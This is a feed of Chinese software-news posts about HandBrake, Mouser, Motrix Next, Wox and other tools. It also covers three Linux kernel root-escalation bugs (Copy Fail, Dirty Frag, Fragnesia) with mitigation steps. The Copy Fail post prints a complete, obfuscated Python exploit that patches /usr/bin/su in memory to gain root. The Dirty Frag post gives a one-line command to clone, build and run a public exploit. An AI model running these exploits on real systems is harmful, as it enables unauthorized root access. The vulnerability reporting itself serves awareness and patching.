最近 1Password 宣布全面涨价，引起了很大的热议。我们除了可以切换到 Sticky Password、EnPass、RoboForm 等替代品外，其实搭建自己的密码库也许是更好的选择。

对于有一定动手能力的同学，部署一个私有的 Bitwarden (Vaultwarden) 自托管密码管理器并不难。它开源免费，数据完全自主可控，同时支持手机电脑跨平台同步+浏览器一键登录插件，可以导入 1Password 或 Chrome 浏览器保存的密码。只需要一台 VPS 服务器 + 域名即可自建……

「 前往查看原文.... 」

• 简单搭建自己的私人密码库！Bitwarden 部署安装教程 (免费 1Password 替代品)
• Sticky Password - 数据不上云！更安全好用的密码管理器 (终身版 1Password 替代品)
• Frpc Desktop - 更简单的内网穿透工具！免费开源 / 桌面客户端 / 开机启动
• FRP 简单入门安装配置教程 - 开源免费内网穿透工具，无公网 IP 远程访问

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

HandBrake 昨日发布 1.11.0 版本，这是2026年的第一次更新，也是一次里程碑式的更新：HandBrake 不再仅仅是那个“压缩视频”的开源工具了。
从这个版本开始，它正式支持专业视频后期流程中的核心格式：ProRes、DNxHR 以及 MOV 容器。 @Appinn

HandBrake 是什么？

这个开源视频转码工具已经有 23 年历史了，支持 Windows、macOS、Linux，可以把各种视频格式转换成 MP4、MKV 等常见格式，同时还能压缩体积、调整分辨率、修改编码参数。

多年来，它就是一款压片神器，可以快速减小视频体积，转换格式。并且简单易用、预设丰富，即开即用。小众软件多次介绍过 HandBrake。

HandBrake 1.11 更新了什么？

• 新增 MOV 容器： 除了 MP4 和 MKV，现在终于可以封装为 .mov 了。
• 支持 ProRes 编码： 包含标准的 Proxy、LT、Standard、HQ 预设。
• 支持 DNxHR 编码： 电影工业级的跨平台中转格式。
• 硬件加速增强： 针对 AMD 9000 系列及更新显卡，支持 AV1 VCN 2160p 4K 硬件编码。
• 无损存档加强： 支持 FFV1 编码，并可封装在 MP4 中，以及 24-bit PCM 无损音频。
• 环境升级： Windows 版现在需要 .NET Desktop Runtime 10.0 环境。

在新版本的预设中，新增了一组 Professional 预设：

这次更新有什么用？

以前使用 HandBrake，它是视频压缩、转码工具，比如：

• 把 MKV 转 MP4
• 把大视频压小
• 把 4K 转成 1080p

从 HandBrake 1.11.0 开始，新增的 ProRes 和 DNxHR，不是用来压视频的，而是用在视频制作流程中的中间格式。例如：

1. 解决剪辑卡顿： 手机录的 H.264/H.265 视频在剪辑软件里极其消耗 CPU。现在你可以先用 HandBrake 批量转码成 ProRes Proxy。虽然体积变大了，但剪辑时拖拽时间轴就像丝般顺滑。
2. 解决音画不同步： 很多手机视频采用“可变帧率（VFR）”，直接进 Premiere 经常声音对不上画面。用 HandBrake 转成固定帧率的 ProRes 或 DNxHR，能根治这个顽疾。
3. 标准化流程： 当你手里有几十种不同来源的零碎素材时，用 HandBrake 统一转成 MOV + ProRes，能让后续的团队协作效率翻倍。

简单说就是：以前 HandBrake 主要是压视频，现在开始变成视频制作工具链的一部分。

ProRes、DNxHR、MOV 分别是什么

其实青小蛙也不是很熟悉这些名词，专门研究了一下：

ProRes

ProRes 是 Apple 推出的一种视频编码格式。特点是：

• 画质高
• 压缩率适中
• 解码速度快

很多剪辑软件（比如 Final Cut、Premiere、DaVinci Resolve）都会使用 ProRes 作为中间格式。它最大的特点是好切、不卡。它不追求极高的压缩比，而是为了让 CPU 能够轻松解码每一帧，是目前视频行业事实上的“中间片”标准。

DNxHR

DNxHR 是 Avid 推出的一种专业视频编码。它的定位和 ProRes 类似，主要用于：

• 视频剪辑
• 后期制作
• 广播电视

很多电视台和影视制作公司会使用这种格式。它的优势在于跨平台稳定性极佳，在 Windows 和 Mac 之间互传素材时，它是非常稳妥的选择。

MOV

MOV 是 Apple QuickTime 的视频容器格式。它就像一个“盒子”（容器），相比 MP4，可以装载更多专业级的视频和音频数据。

MOV 是专业剪辑软件 Final Cut Pro 的默认封装容器。虽然 FCP 也能读 MP4，但 MOV + ProRes 的组合在 FCP 里有原生加成：速度快、稳定性高、Alpha 通道。

如果你打算把素材拿给 FCP 用，记得在 HandBrake 中选 MOV 容器 + ProRes 编码，这就是 FCP 的“满血套餐”。

获取

• 官网
• 搬运

原文：https://www.appinn.com/handbrake-1-11-0/

相关阅读

• HandBrake – 轻量视频格式转换
• 开源视频转码器 HandBrake 1.7.0 发布
• HandBrake – 18 年历史，免费开源的视频格式转换工具[Win/macOS/Linux]
• 免费开源的视频格式转换软件 HandBrake 1.8.0 发布
• 如何压缩「讲座类网课视频」文件的尺寸，以节省空间

ffmpeg-over-ip 是一款支持 Win/mac/Linux 的开源项目，它的作用是：把 ffmpeg 变成远程工具。
即：你在任何地方使用 ffmpeg 处理视频，实际上工作的是远程高性能电脑上的 ffmpeg。

这个工具的用途…不太明朗。

青小蛙能想到的，就是局域网中有一台高性能 GPU，通过 ffmpeg-over-ip 可以实现在其他设备上调用这块 GPU 进行 ffmpeg 视频编码、解码的工作。

ffmpeg-over-ip

项目地址：https://github.com/steelbrain/ffmpeg-over-ip

开发者的意思，用户可以从任何地方（Docker 容器、虚拟机或远程计算机）访问远程的 ffmpeg，而无需设置 GPU 直通或共享文件系统。

原理是这样的：

一些常见的问题：

• Docker 容器需要 –runtime=nvidia、设备挂载以及主机和容器之间的驱动程序版本对齐
• 虚拟机需要 PCIe 直通或 SR-IOV — 将 GPU 锁定到一台虚拟机的复杂设置
• 远程计算机需要共享文件系统 (NFS/SMB) 以及随之而来的所有路径映射、挂载维护和权限问题
• 你只希望媒体服务器使用 GPU 进行转码。您不需要重组您的基础设施来实现这一目标。

ffmpeg-over-ip 就是用来解决这一切问题的。

这样看起来，更像是一台 GPU 主机下的虚拟机，或者 Docker 容器需要访问 GPU 的情况。

总之，有比没有强点吧。

原文：https://www.appinn.com/ffmpeg-over-ip/

相关阅读

• 史上最简单，在线 FFmpeg！浏览器直接用 + AI 懂人话，不用下载、不用命令行
• FFmpeg 7.0 “Dijkstra” 发布，全世界最低调的视频与音频处理工具
• FFmpeg 投诉 Rockchip(瑞芯微电子) 两年无果，向 GitHub 提交 DMCA 删除通知后，相关代码被屏蔽
• Droid Over Wifi – 通过 Wi-Fi 传输数据[Android]
• 最简单：用 FFmpeg 制作延时摄影视频｜Timelapse

谁说 Linux 没有语音输入法？来了！

audiov 是一款适用于 Linux 发行版的语音转文本、语音打字、听写软件，Rust 编写。它使用 whisper 进行本地语音识别，之后再注入 fcitx5 输入法。@Appinn

它可以直接将文字直接“提交”到当前光标处，体验接近原生键盘输入。

主要功能：

• 本地离线识别：基于 whisper.cpp，支持在本机 CPU/GPU 上完成语音转写，数据不离开设备。
• 远端 Whisper 接口：支持通过配置切换到 Whisper 兼容的远端 API。
• 输入体验极致丝滑：通过 fcitx5 的 DBus 接口直接将文字“提交”至光标处，无需经过剪贴板，体验极其接近原生键盘输入。
• KDE 全局快捷键：通过 org.kde.KGlobalAccel 注册全局快捷键，默认 Meta+H 单键切换录音。
• 手动录音模式：保留前台交互录音模式，便于调试与验证链路。收起

获取

• https://github.com/WhiteSmoogy/audiov

原文：https://www.appinn.com/audiov-linux/

相关阅读

• Lima – macOS 上的 Linux 虚拟机、Docker 容器，像 WSL2 一样
• 密码管理器 1Password 发布第一个 Linux 测试版本
• 《Linux 就该这么学》 – 售价 79 元的 Linux 「零基础」书籍免费送
• 送 15 本纸质书：《Linux 就该这么学》
• 整活啦：为 Windows 桌面右下角添加激活水印，就像未激活的 Windows 桌面那样显示「激活 Windows」

愿你的 Token 永远用不完！

CodexBar 是一款实时显示大模型剩余额度的 macOS、Linux 工具，它能自动检测当前系统已经登录的大模型，并显示剩余余额。支持阿里巴巴、智谱、MiniMax、Kimi 等很多款大模型。@Appinn

macOS 拥有图形界面，Linux 是命令行工具。

另外，CodexBar 的开发者也是 OpenClaw 的开发者 Peter Steinberger。

CodexBar 支持的大模型

• Codex
• Claude
• Cursor
• OpenCode
• 阿里巴巴（百炼Coding Plan）
• Droid
• Gemini
• Antigravity（反重力）
• Copilot
• z.ai（智谱）
• MiniMax
• Kimi
• Kimi K2
• Kilo
• Kiro
• Vertex AI
• Augment
• JetBrains AI
• Amp
• ollama
• Synthetic
• Warp
• Openrouter

命令行

在 Linux 上只有命令行，大概是下面这个样子的：

最方便的地方在于，你不需要重新登录，即开即用，自动识别。

获取

• GitHub

安装

brew install --cask steipete/tap/codexbar

Linux（仅限 CLI）

brew install steipete/tap/codexbar

原文：https://www.appinn.com/codexbar/

「 前往查看原文.... 」

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

1月份时候发了一篇《罗技驱动 Logitech Options+ 精简瘦身小工具》  提供了一个可以按需开启功能的安装脚本「tjsky/logi-options-plus-mini」 。没想到大家苦罗技久矣，这项目发布后不仅大家很是捧场，还被某知名科技自媒体翻牌子引用，成了我 GitHub 上 Stars 数量最高的项目

不过开心归开心，只能说是治标不治本。虽然该项目可以阻止多余功能被启用，但所需的依赖文件依然稳如泰山地躺在硬盘里。再配合罗技 Options+ 那每周雷打不动、重新下载小几百 MB 文件，而且还从！不！删！除！旧副本 （拿用户硬盘当自家的垃圾场是不）的“特性”（Bug），。实测下来，即使精简到了极致，用了三个月后，这玩意儿的文件体积依然原地爆炸，膨胀到了 2GB！

然后我就发现了一个好东西： Mouser，一个极其轻量、开源、完全本地运行 的 Logitech Options+ 替代品

Mouser 简介

Mouser 是一个极其轻量、开源、完全本地运行的 Options+ 替代品，专门用来对罗技 HID++ 鼠标进行按键和手势的重映射。目前对 MX Master 系列鼠标的体验最为丝滑，同时对其他罗技型号也提供了早期识别和通用 UI。

划重点：无需云端、无需罗技账号、纯本地运行！ 安装包体积只有 50 MB（对比罗技官方完整离线版驱动的安装包是1.1GB， 要知道半条命2整个游戏也才1G大……）

截图

Mouser 当前支持的设备

Mouser 安装与配置（Windows/macOS/Linux）

1. 直接去它的 最新 Release 页面 下载。（Windows 国内备用下载点：蓝奏云｜城通｜百度｜夸克｜123盘）
2. 根据你的系统下载对应的压缩包：Mouser-Windows.zip、Mouser-macOS.zip 或者 Mouser-Linux.zip。
3. 解压到你顺手的任意目录（随便找个不会被你不小心删了地方就行）。
4.  最关键的一步：彻底关闭你后台的 Logitech Options+！ 
5. 运行它：双击 Mouser.exe（Windows） / Mouser.app（macOS） / 终端运行 ./Mouser（Linux）。
6. 搞定！程序启动后会接管你的鼠标，开始重映射按键。

(注：macOS 下会管你要两个隐私权限，用来获取鼠标状态；Linux 需要给 /dev/input/event* 的读取权限和 /dev/uinput 的写入权限。 是用来获取当前光标所在程序，实现配置切换功能的)

PS：不过话说回来，macOS 用户其实不如直接去用 SteerMouse 或者 BesterMouse 虽然需要掏钱，但好用的多，而且鼠标的平滑滚动更接近苹果原生体验。至于 Linux 用户，LogiOps 才是你最好的选择吧，虽然这个没GUI界面，但是效果更好。

使用防翻车指南

• Mouser的局限性：目前对 MX Master 系列鼠标是最完美支持的，MX Anywhere 系列的功能键（就是鼠标背上的键）目前还只能直通，无法映射其他功能。罗技其他系列鼠标，比如M590啥的水平滚轮貌似识别有点问题。
• Windows SmartScreen 可能会弹窗拦截： 点击 更多信息 (More info) → 仍要运行 (Run anyway)就好了。
• Logitech Options+ 必须退干净：如果它俩同时抢夺 HID++ 访问权，会一起崩溃给你看的。
• 配置文件会存在这里：%APPDATA%\Mouser（Windows）、~/Library/Application Support/Mouser（macOS）、~/.config/Mouser（Linux）。
• 平时 Mouser 不需要管理员权限的。但如果玩某些游戏或者系统级弹窗时发现侧键的按键映射没生效，可以尝试给个管理员权限试试。
• MX Master 系列鼠标配置界面会自动适配交互式配置图（中间这个画着鼠标的配置界面），MX Anywhere 和 MX Vertical 系列可能需要手动在界面右上角切换一下对应的交互式配置图，目前只是实验性支持，可能图和你鼠标实际长得样子不太一样。
• 简而言之：如果你是MX Master、MX Anywhere系列罗技鼠标的话，且只需要配置快捷键映射和DPI调节等功能，可以试一下Mouser，告别臃肿的 Logitech Options+ 。

原文链接：https://meta.appinn.net/t/topic/83933

相关阅读

• 罗技驱动 Logitech Options+ 精简瘦身小工具
• Folder Menu – 瞬间切换文件夹
• Mashups – 复活 Yahoo! Pipes，过滤、组合、转换 RSS、CSV
• Folder Options X – 增强文件夹功能 X 档案[Windows7]
• 如何替代 Windows 默认记事本（Notepad）为第三方工具

最近很多操作系统都纷纷发布了新版本，比如 Windows 11、Ubuntu、Debian、Deepin、优麒麟、CentOS、Fedora、PVE、WinPE 等等，对喜欢玩系统的人来说绝对是盛宴。

不过一般用 Rufus 等工具，一个 U 盘往往只能制作成一个系统的启动盘/安装盘，想要增加另一款系统，只能得重新刻录一遍，每次都要格式化超花时间。而最近发现了一款“多合一启动盘”的制作工具 Ventoy，简单到拷贝个 ISO 文件进去就能用，堪称新一代的装机必备神器……

「 前往查看原文.... 」

• 优启通 EasyU - 好用无广告纯净版 WinPE 系统启动盘 / U盘重装系统工具
• 微PE工具箱 (WePE) v2.3 - 大家都说好用的纯净 WinPE 启动盘/ U盘重装系统工具
• 一盘走天下 OnePE - 一个 U 盘搞定 20 年新老电脑维护装机 (5合1 PE 启动盘)
• CowPE - 基于 Win11 纯净好用无捆绑的 PE 系统 (U盘启动盘 / 装机必备)

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

说到最红火的 Linux 发行版当属 Ubuntu 了！它拥有漂亮的 UI 界面，跟 macOS 风格相比也有过之而无不及，而当你试过这款操作系统后，可能会对 Linux 刻板枯燥的印象产生巨大的改变。

在 Ubuntu 的世界里，已经不再只是简陋的界面+命令行，而是一款时尚易用同时又足够实用的操作系统，网上也有着最丰富的资料。对大多数没接触过 Linux 想尝鲜学习的话，Ubuntu 绝对是入门首选。那么，究竟有什么魅力让那么多非技术爱好者也为之疯狂？我们一起来看看吧……

「 前往查看原文.... 」

• 《Linux 就该这么学》PDF 电子书下载 - 更适合零基础新手入门学习的书籍教程
• FreeBSD 13.1 系统镜像 - 体验与 Linux 不同的 UNIX 哲学
• AlmaLinux 10.2 镜像 - 完美替代 CentOS / 兼容 RHEL！免费开源企业级 Linux 系统
• Fedora 43 正式版镜像下载 - 更新快 / 软件包版本新 / 开放的 Linux 发行版系统

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

「 前往查看原文.... 」

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

Edit 是微软去年开源的命令行编辑器，它支持鼠标控制菜单、可同时打开多个文件、拥有查找与替换功能、支持自动换行。
2.0.0 版本新增语法高亮功能，增加了40KB，使体积达到了 294KB（Linux 下）。@Appinn

Edit 支持 Windows、Linux 与 macOS，不过 Windows 版本的体积接近 2MB。

只需要点击左下角 XML 即可改变高亮语言：

微软使用了 a dozen（一打）高亮语言数量，青小蛙数了下，有15种，非常轻量级，只增加了 40kB 的体积。

• 纯文本
• Diff
• Github Commit/Rebase
• Ignore
• JavaScript
• JSON
• LSH
• Markdown
• Power Shell
• Properties
• Python
• Shell
• Script
• XML
• YAML

支持自动识别。

其他更新

• 新增语法高亮
• 初步支持 settings.json（仅 files.associations）
• 查找替换支持正则捕获组（$1 等）
• 多项编辑增强（移动行、批量缩进、选中当前行等）
• 文件列表改为自然排序，未保存有提示
• 修复大量 Unicode、滚动、Linux/macOS 相关问题
• 内置多语言界面（暂不可切换）

其他变化不大，可以参考之前的文章：《微软发布开源命令行编辑器 Edit，大小不到 250kB》。

获取

• GitHub

原文：https://www.appinn.com/microsoft-edit-v2/

对青小蛙来说，edit 最大的用途就是在 Docker 容器内，当网络不好无法下载 vim 的时候，使用 edit 就很合适

相关阅读

• 微软的 150 款免费软件[部分，待更新]
• 微软官方超实用 15+ 小工具集 PowerToys v0.62.0 发布，新增文本提取器 OCR 功能
• Win11Debloat – 微软欠我的性能该还了：一键卸载 90+ 款 Windows 11 预装软件[2026.3.15 中文更新]
• Vim 替代者？微软发布开源命令行编辑器 Edit，大小不到 250kB
• Print Edit – 在保存或打印前修改网页内容[Firefox]

[ 点击前往获取链接 ]

你上一次认真把玩命令行终端软件是什么时候？估计大部分人的答案都是：不折腾，能用就行。毕竟终端这玩意儿，从 70 年代到现在，核心交互就没变过：一个黑框框，敲命令，看输出。

而最近一款 Rust 开发的高性能、原生 AI 驱动的现代化 SSH 终端软件 Warp，突然宣布开源！GitHub 星标一夜冲到 3 万+，评论区一片欢腾！Warp 到底做了什么，能让一帮程序员如此激动？简单说，它不仅把终端从能用变成“好看+好用”，甚至让人遐想到未来的终端长什么样……

「 前往查看原文.... 」

• 还用 XShell？这款跨平台 SSH 终端工具 iShell Pro 更好用！支持 SFTP 集成 AI
• Xterminal - 集成 AI 免费跨平台 SSH 终端工具 (服务器文件管理 / 状态监控 / AI 命令解释补全)
• LNMP 一键安装包 - 简单快速 Linux 服务器建站 / 安装配置 Nginx PHP MySQL 脚本
• PuTTY - Windows 下超经典知名的免费 SSH 客户端工具软件

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

只需要10行代码，就能获得自2017年至今大多数 Linux 发行版本的 root 权限。史称 Copy Fail，漏洞编号 CVE-2026-31431

先看提权演示视频

演示代码

代码来自这里，请仅在自己的机器上测试该漏洞：

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Linux 里有一种比较底层的接口，叫 AF_ALG，用来给程序做加密/解密的。它的数据会直接在内核里传来传去，不走普通读写路径。

问题出在这里，内核在处理这条数据通道时，没有区分“只读”和“可写”。

比如这段代码，它把额外的数据写入了内存中的 /usr/bin/su 程序，相当于修改了内存中的 su 程序（该程序权限很高），所以执行 su 的时候，就拿到了 root 权限。

Copy Fail

有人专门为这件事制作了一个漏洞演示网站，就叫做 Copy Fail，复制失败。

它还同时演示了 Ubuntu 24.04、Amazon Linux 2023、RHEL 14.3、SUSE 16 几个不同系统中招的过程：

该漏洞的利用过程是这样的：

1. 打开 su（目标程序）
2. 解压一段隐藏代码（payload）
3. 利用内核漏洞
4. 把 payload 写进内存里的 su
5. 执行 su → 拿 root

谁受影响

Copy Fail 只需要一个非特权本地用户账户，不需要网络访问权限，不需要内核调试功能，也不需要预装底层程序。基本上所有主流发行版的默认配置都启用了内核加密 API (AF_ALG)，因此整个 2017 → 补丁发布窗口之前的操作系统，都…开箱即用。

注意，Linux 被广泛应用在各种设备中，包括电脑、服务器、云平台、路由器、NAS、物联网设备，甚至部分手机系统，因此影响范围非常广。

怎么办？

更新你的操作系统。

原文：https://www.appinn.com/copy-fail-cve-2026-31431/

相关阅读

• 群晖两连更：几乎没人用功能，Telnetd 爆出两个 9.8 分 CVE 漏洞
• Windows 记事本爆出 8.8 分漏洞，专门针对 markdown 格式｜CVE-2026-20841
• React 爆出满分 10.0 漏洞（CVE-2025-55182）上一次同等级漏洞还是 Log4Shell
• 在特朗普政府威胁要中断 CVE 资金之后，欧盟当日就上线了自己的漏洞数据库（EUVD）
• Molili：当贝推出中文版 OpenClaw，不看教程都能用[Windows/macOS]

[ 点击前往获取链接 ]

还记得前几天的漏洞么：Copy Fail：2017年至今的漏洞，一个脚本获得 Linux root 管理员权限｜CVE-2026-31431
没想到，又来了。

Dirty Frag

这次叫 Dirty Frag，暂时还未获得 CVE 编号。普通用户可以在大多数 Linux 机器上立即获得 root 访问权限，没有可用的补丁，也没有发出警告。

Dirty Frag 的机制与前几天的 Copy Fail 很像，影响了 2017 年以来的大多数 Linux 系统，包括：

• Ubuntu
• Debian 系
• Fedora
• RHEL / AlmaLinux
• Arch
• OpenSUSE
• CentOS Stream
• 甚至 WSL2

消息最早来自 Openwall（Linux 安全邮件列表）：

主题：脏片段（Dirty Frag）：通用 Linux 本地提权漏洞
您好，
这是一份关于“脏片段”（Dirty Frag）的报告，该漏洞为通用型本地权限提升（LPE）漏洞，允许在所有主流Linux发行版上获取root权限。

此漏洞的影响与之前的复制错误（Copy Fail）类似。

由于保密协议现已被打破，目前没有任何针对这些漏洞的补丁或CVE编号。在与linux-distros@…openwall.org维护者协商后，并根据维护者的要求，我现公开这份《脏片段》文档。

与先前的复制错误（Copy Fail）漏洞一样，“脏片段”同样能在所有主流发行版上实现即时root权限提升，它串联了两个独立的漏洞：

• https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
• https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/

由于负责任的披露时间表和保密状态已被破坏，目前所有发行版均无可用补丁。

测试漏洞

任何本地用户，只需要运行一段代码，就能直接获得机器的 root 权限。

它不依赖特定环境，什么都不需要，本质上就是一个内核逻辑错误，一行：

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

临时解决方案

幸运的是，目前的历史解决方案：禁用 esp4、esp6 和 rxrpc 模块即可。

这些模块都和 IPSec 网络功能有关，普通服务器、NAS、开发机通常不会用到。

## 告诉 Linux 不再加载这些模块
printf 'install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
' > /etc/modprobe.d/dirtyfrag.conf

## 卸载已经加载的模块
rmmod esp4 esp6 rxrpc

## 检查是否还在
lsmod | grep -E 'esp4|esp6|rxrpc'

技术原理

与 Copy Fail 类似，Dirty Frag 也利用了 Linux 的“零拷贝（zero-copy）”机制，把原本只读的 page cache 变成了可写目标。

不同的是，Copy Fail 出问题的是加密优化代码，而 Dirty Frag 出问题的是 IPSec 相关模块。

Linux 在 2017 年加入的一段网络相关代码里埋下了这个漏洞，并一路影响到了今天的大多数发行版。

Ubuntu 因为有 AppArmor 防护，单靠第一个漏洞还不够，所以研究人员又串联了另一个 RxRPC 漏洞，最终实现 root 提权。

措手不及

Dirty Frag 之所以让很多管理员来不及反应，是因为漏洞虽然早在 4 月 30 日就已经报告给 Linux 内核团队，但有第三方提前打破了保密披露流程。

官方没有说明具体原因，不过外界猜测，这可能意味着漏洞已经开始被实际利用，因此不得不提前公开。

原文：https://www.appinn.com/dirty-frag/

怎么说呢，麻了，记得更新系统。

……哦不对，现在还没补丁

[ 点击前往获取链接 ]

Motrix Next 是一款跨平台下载工具，基于 aria2c，支持 BT、磁力、迅雷链接，有浏览器扩展，用 Tauri 替换掉了 Electron，安装包降到了 ~20MB。@Appinn

来自发现频道，开发者自荐：https://meta.appinn.net/t/topic/84964/

Motrix Next — Motrix 精神续作来了

主包是学术缅北工科 PhD，纯粹是读博期间发现 macOS 上没有顺手的下载器，Motrix 又停更了，就自己从零搓了一个。没想到后来居然有这么多人用，既然大家需要，那就继续维护下去了。目前发布了 2 个月， 已经5.1k star。

核心就是用 Tauri 替换掉了 Electron，安装包降到了 ~20MB，大幅优化了界面以及过渡动画，遵循 Google M3 动效规范，并配套官方浏览器扩展，支持 Chromium 系和 Firefox 等浏览器。

先回顾下 Motrix 吧：

• 2019：Motrix – 开源下载工具，支持 BT、磁力链、百度盘下载[Win/macOS/Linux]
• 2023：Motrix 时隔 2 年发布新版本：多功能开源跨平台下载工具，45 项更新

现状是 2023 年之后，就再没更新过了。

我也不知道为什么大家对下载工具如此执着，不光是用户，连开发者也是。

大概是一直也没有一款完美的下载工具，吧。

为什么选择 Motrix Next？

sekiro 同学在官网是这样说的：「agalwood 开发的 Motrix 是最优秀的开源下载管理器之一 — 界面简洁、aria2 驱动、跨平台。它启发了无数用户和开发者。」

「原项目自 2023 年起基本停止维护。Electron + Vue 2 + Vuex + Element UI 技术栈积累了大量技术债务，越来越难以维护、扩展和打包。」

Motrix Next 长这样

安装包 Windows 版本 16.3 MB，macOS 版本 20.9 MB，.deb 包 25.4 MB。

青小蛙在 Windows 下安装以后，文件夹大小为：50.6MB，相当惊喜。

主要功能

多协议

HTTP、FTP、BitTorrent、磁力链接。

BitTorrent

选择性文件下载、DHT、对等交换、加密。

Tracker 管理

从社区 Tracker 列表自动同步。

并发下载

最多 10 个任务，可配置线程数。

速度控制

全局和单任务上传/下载限速。

系统托盘

菜单栏实时速度显示（macOS）。

深色模式

原生深色主题，自动检测系统偏好。

国际化

首次启动自动检测系统语言。

任务管理

暂停、恢复、删除并清理文件、批量操作。

协议处理

注册为磁力链接和迅雷链接的默认处理程序。

通知

任务完成时发送系统通知。

轻量级

Tauri 驱动，最小资源占用。

获取

• GitHub｜搬运（仅搬运了 Windows 与 macOS 版本，有其他需求留言）
• 浏览器扩展：
  • Chrome
  • Edge
  • Firefox

原文：https://www.appinn.com/motrix-next/

最后，开发者还说：后面博士忙起来可能更新会慢一些，毕竟毕业才是主线任务。

如果觉得好用，希望各位佬帮忙在国外社区宣传宣传（Reddit、Hacker News、Twitter 之类的），让更多人知道这个项目，也算是对我最大的支持了。

相关阅读

• Motrix 时隔 2 年发布新版本：多功能开源跨平台下载工具，45 项更新
• Next Terminal – 用浏览器访问远程桌面，支持 RDP、SSH、VNC 和 Telnet
• imfile – 源自 Motrix，跨平台下载工具，支持 HTTP、BT、磁力
• Motrix – 开源下载工具，支持 BT、磁力链、百度盘下载[Win/macOS/Linux]
• tagLyst Next – 文件入库、加标签，解决文件分类与聚合的难题[Win/macOS]

[ 点击前往获取链接 ]

从4月30日至今，Linux 已经连爆三起提权漏洞，只需要一行代码，立即获得系统 root 权限。

• 2026年4月30日：Copy Fail：2017年至今的漏洞，一个脚本获得 Linux root 管理员权限｜CVE-2026-31431
• 2026年5月8日：Linux 又爆 Dirty Frag 漏洞：Ubuntu、Debian、Arch、RHEL、WSL2 全中招｜CVE-2026-43284
• 2026年5月14日：Fragnesia：普通用户可通过 Linux 内核里的网络/加密处理逻辑，把只读文件在“页缓存”里的内容临时改掉，然后借此拿到 root

Fragnesia 漏洞

这次漏洞被叫做 Fragnesia（PoC 仓库代码），编号 CVE-2026-46300，得分 7.8 分。

Fragnesia 属于 Dirty Frag 漏洞家族，但并不是同一个漏洞，而是 Linux ESP/XFRM 模块中的另一处独立问题，因此需要单独修复。不过，两者影响的位置相似，临时缓解方法也一样。

攻击者可以利用 Linux 内核 ESP-in-TCP 子系统中的逻辑错误，只需要修改只读文件在内存中的页缓存内容，就能实现提权。

主要涉及服务

如果你的服务上有以下服务，请谨慎对待：

• IPsec VPN
• StrongSwan
• 企业 VPN
• 某些 AFS/RPC 服务

如何临时解决？

官方 PoC README 给出的缓解方案是：

# 卸载当前已经加载的模块。
sudo modprobe -r esp4 esp6 rxrpc

# 取消启动加载：
printf 'install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
' | sudo tee /etc/modprobe.d/fragnesia.conf

# 重启
sudo reboot

# 确认，没有输出即可
lsmod | grep -E 'esp4|esp6|rxrpc'

青小蛙看了眼手上的服务器，都还好，没中招。

相关阅读

• 群晖两连更：几乎没人用功能，Telnetd 爆出两个 9.8 分 CVE 漏洞
• Windows 记事本爆出 8.8 分漏洞，专门针对 markdown 格式｜CVE-2026-20841
• React 爆出满分 10.0 漏洞（CVE-2025-55182）上一次同等级漏洞还是 Log4Shell
• 在特朗普政府威胁要中断 CVE 资金之后，欧盟当日就上线了自己的漏洞数据库（EUVD）
• Molili：当贝推出中文版 OpenClaw，不看教程都能用[Windows/macOS]

[ 点击前往获取链接 ]

老牌开源桌面启动器 Wox v2.1.0 发布，支持 Windows、macOS 与 Linux，没有使用Electron，新增了系统状态查询、截图功能（带标注）、新的文件预览、AI 命令等功能。@Appinn

来自发现频道，开发者自荐：https://meta.appinn.net/t/topic/85559

【开源免费自荐】Wox v2.1.0 发布 – 老牌跨平台桌面启动器

老牌桌面启动器，现在支持跨平台(非Electron)，虽然中间停更过一段时间，但是23年起就恢复维护至今， 可放心使用。

青小蛙在2023年10月份的时候，注意到了：《活久见，跨平台快速启动工具 Wox v2.0.0 更新｜“Alfred 和 Launchy 替代品”》，当时还是早期 alpha 版本，直到2026年2月份正式发布了 v2.0 版本。

然后就是现在的 2.1 版本。主要新功能如下：

Glance

将 Glance 添加到查询框，用户无需输入内容，就能直接看到一些轻量级实时信息，例如时间、日期、电池状态、CPU 占用率、内存使用情况等。

插件还可以提供 Glance 元数据，用户既可以显示 Glance 项目，也可以隐藏 Glance 图标，让查询框界面更简洁。

Screenshot

为 Screenshot 扩展加入了：

• 滚动截图
• 固定截图叠加显示
• 插件截图 API
• 可配置的历史记录保留功能

现在可以截取长页面或长窗口，也能把截图固定在其他窗口上方作为参考。旧截图还能自动清理，插件也支持隐藏工具栏、自动确认后直接进入截图流程。

Preview

重新设计了预览界面，新增：

• 列表预览
• 图片叠加预览

整体界面更统一、更简洁。

对于剪贴板、截图等图片较多的结果，现在可以直接在轻量级浮层中查看，而不再局限于启动器内部的预览面板。

Query Refinement

新增细化控制功能，插件可以直接在启动器中提供筛选和排序选项。

例如文件搜索现在支持：

• 按相关性排序
• 按名称排序
• 按修改时间排序
• 按文件大小排序
• 区分文件与文件夹

剪贴板和 WPM 也可以显示自己的类型、安装状态等过滤条件。

AI Command

